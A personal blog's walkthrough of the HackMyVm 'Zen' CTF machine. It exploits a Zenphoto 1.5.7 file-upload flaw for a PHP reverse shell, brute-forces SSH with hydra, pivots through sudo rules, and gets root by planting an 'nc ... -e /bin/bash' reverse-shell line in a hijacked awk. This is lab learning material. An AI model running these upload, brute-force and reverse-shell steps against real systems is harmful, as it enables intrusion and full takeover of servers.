Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Zen Walkthrough

HackMyVm Zen Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Zen

Scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100   
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 c3:a0:ac:5d:25:92:47:2c:f5:70:ba:1b:f0:a3:b9:67 (RSA)
 |   256 03:72:ad:7b:df:46:5d:b3:2a:9b:69:a9:c4:11:35:86 (ECDSA)
 |_  256 4b:a1:81:88:73:2a:a0:b6:5c:9f:30:d9:c9:7f:1f:3f (ED25519)
 80/tcp open  http    nginx 1.14.2
 | http-robots.txt: 9 disallowed entries
 | /albums/ /plugins/ /P@ssw0rd /themes/ /zp-core/
 |_/zp-data/ /page/search/ /uploaded/ /backup/
 |_http-server-header: nginx/1.14.2
 |_http-title: Galer\xC3\xADa
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel    

From main page, get the app name and version number.

 ~ curl http://192.168.56.99
 <!DOCTYPE html>  
 ...
 </body>
 </html>
 <!-- zenphoto version 1.5.7 -->

Google the zenphoto version 1.5.7, we know it has upload vulnerability.

             Authenticated arbitrary file upload to RCE
 
 Product : Zenphoto
 Affected : Zenphoto CMS - <= 1.5.7
 Attack Type : Remote
 
 login then go to plugins then go to uploader and press on the check box elFinder
 then press apply , after that you go to upload then Files(elFinder) drag and drop
 any malicious php code after that go to /uploaded/ and you're php code
 
 --------------------------------------------------------------------------------------------
 Zenphoto through 1.5.7 is affected by authenticated arbitrary file
 upload, leading to remote code execution. The attacker must navigate to
 the uploader plugin, check the elFinder box, and then drag and drop
 files into the Files(elFinder) portion of the UI. This can, for
 example, place a .php file in the server's uploaded/ directory.
 
 [Reference]
 https://www.linkedin.com/in/abdulaziz-almisfer-22a7861ab/
 https://twitter.com/3almisfer
 https://github.com/azizalshammari/

From robots.txt, found a strange string: P@ssw0rd.

Find the login panel of zenphoto at /zp-core/admin.php, login with admin:P@ssw0rd.

Upload a php shell and get reverse shell.

 & kali @ mykali in ~/Documents/zen 0 [13:57:14]
 ~ nc -nlvp 1234        
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:38120.
 Linux zen 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
  20:23:18 up 16 min,  0 users,  load average: 0.00, 0.02, 0.04
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 & kali @ mykali in ~/Documents/zen 0 [14:05:51]
 ~ curl http://192.168.56.99/backup/r.php

Found 3 users in home folder.

 www-data@zen:/home$ ls -la
 ls -la
 total 20
 drwxr-xr-x  5 root      root      4096 Jun 14 03:45 .
 drwxr-xr-x 18 root      root      4096 Jun 14 03:19 ..
 drwxr-xr-x  2 hua       hua       4096 Jun 14 03:45 hua
 drwxr-xr-x  2 kodo      kodo      4096 Jun 14 03:24 kodo
 drwxr-xr-x  3 zenmaster zenmaster 4096 Jun 14 03:47 zenmaster

Because we can found no way to escalate to anyone of these 3 users, so we can only bruteforce ssh credentials.

 ~ hydra -L names.txt -P names.txt -e nsr 192.168.56.99 ssh -t64 -F                                       ...
 [DATA] attacking ssh://192.168.56.99:22/
 [22][ssh] host: 192.168.56.99   login: zenmaster   password: zenmaster

Login as zenmaster, escalate to kodo.

 enmaster@zen:~$ sudo -l
 Matching Defaults entries for zenmaster on zen:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User zenmaster may run the following commands on zen:
     (kodo) NOPASSWD: /bin/bash
 zenmaster@zen:~$ sudo -u kodo /bin/bash -p

As user kodo, check sudo -l. Use the edit function, and press !:/bin/bash, escalate to user

 kodo@zen:/home/zenmaster$ sudo -l
 Matching Defaults entries for kodo on zen:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User kodo may run the following commands on zen:
     (hua) NOPASSWD: /usr/bin/see
 kodo@zen:/home/zenmaster$ touch /tmp/tmp.txt
 kodo@zen:/home/zenmaster$ chmod 666 /tmp/tmp.txt
 kodo@zen:/home/zenmaster$ sudo -u hua /usr/bin/see --action=edit /tmp/tmp.txt
 hua@zen:/home/zenmaster$ id
 uid=1002(hua) gid=1002(hua) groups=1002(hua)

Check sudo -l.

 hua@zen:/tmp$ sudo -l
 Matching Defaults entries for hua on zen:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User hua may run the following commands on zen:
     (ALL : ALL) NOPASSWD: /usr/sbin/add-shell zen

We can write to /use/local/bin.

 hua@zen:/tmp$ find / -writable -not -path '/proc*' 2>/dev/null  
 ...
 /tmp/.X11-unix
 /usr/local/bin
 /usr/lib/systemd/system/mountnfs-bootclean.service
 ...

Use strace to track add-shell, it calls awk, cat, rm from /usr/local/bin, which don't exist.

 hua@zen:/tmp$ strace /usr/sbin/add-shell zen 2>&1 |grep /usr/local/bin
 stat("/usr/local/bin/awk", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
 stat("/usr/local/bin/cat", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
 stat("/usr/local/bin/rm", 0x7fff52bfdb80) = -1 ENOENT (No such file or directory)
 hua@zen:/tmp$ ls -la /usr/local/bin/awk
 ls: cannot access '/usr/local/bin/awk': No such file or directory
 hua@zen:/tmp$ ls -la /usr/local/bin/cat
 ls: cannot access '/usr/local/bin/cat': No such file or directory
 hua@zen:/tmp$ ls -la /usr/local/bin/rm
 ls: cannot access '/usr/local/bin/rm': No such file or directory

Then we can write a shell code in awk, and get root shell.

 hua@zen:/tmp$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /usr/local/bin/awk 
 hua@zen:/tmp$ chmod +x /usr/local/bin/awk
 hua@zen:/tmp$ sudo /usr/sbin/add-shell zen
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 & kali @ mykali in ~ 0 [15:25:33]
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:38124.
 id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 zen




发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0